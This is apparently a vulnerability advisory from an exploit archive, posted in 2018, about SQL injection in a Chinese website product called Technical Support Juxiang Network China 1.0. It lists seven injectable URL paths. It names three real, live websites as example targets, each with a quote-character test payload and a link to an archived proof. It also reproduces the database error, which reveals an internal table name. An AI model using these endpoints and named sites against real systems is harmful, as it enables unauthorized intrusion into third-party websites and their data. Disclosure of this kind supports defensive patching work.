Technical Support Juxiang Network China 1.0 SQL Injection

Technical Support Juxiang Network China version 1.0 suffers from a remote SQL injection vulnerability.


MD5 | f8a1ae851d43ad857f356a3bb574427a

########################################################

# Exploit Title : Technical Support Juxiang Network China 1.0 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Date : 30/12/2018
# Vendor Homepages/Owners : dedaogame.com / radiantviewer.com /
feesee.com / d58.net / linkedin.com/in/juxiang-jin-77131546 /
shop1369760423327.1688.com
# Tested On : Windows
# Exploit Risk : Medium
# Version Information : 1.0
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements
used in an SQL Command ('SQL Injection') ]
# CxSecurity Exploit Reference Link : cxsecurity.com/ascii/WLB-2018050311

########################################################

China Hangzhou City Technical Technology

Support Juxiang Network SQL Injection Vulnerability

########################################################

# Exploit : /?id=[SQL Injection]
# Exploit : /en/list.php?id=[SQL Injection]
# Exploit : /en/img_anis.php?id=[SQL Injection]
# Exploit : /en/message.php?id=[SQL Injection]
# Exploit : /en/aboutus.php?id=[SQL Injection]
# Exploit : /contents.php?id=2&cid=[SQL Injection]
# Exploit : /message.php?id=[SQL Injection]

########################################################

# Example Site => hzjkang.com/en/aboutus.php?id=1%27

=> [ Proof of Concept for SQL Injection ] => archive.is/67pRx

# Example Site => atk-china.com/aboutus.php?id=1%27

=> [ Proof of Concept for SQL Injection ] => archive.is/YtoHD

# Example Site => hszxrz.com/aboutus.php?id=1%27

=> [ Proof of Concept for SQL Injection ] => archive.is/3GHK6

########################################################

# SQL Database Error =>

PHPMyWind MySql Errori1/4

/aboutus.php
You have an error in your SQL syntax; check the manual that corresponds

to your MySQL server version for the right syntax to use near '\'' at line
1

Error sql: SELECT * FROM `hzjx_infoclass` where id=1\'

########################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
########################################################

Related Posts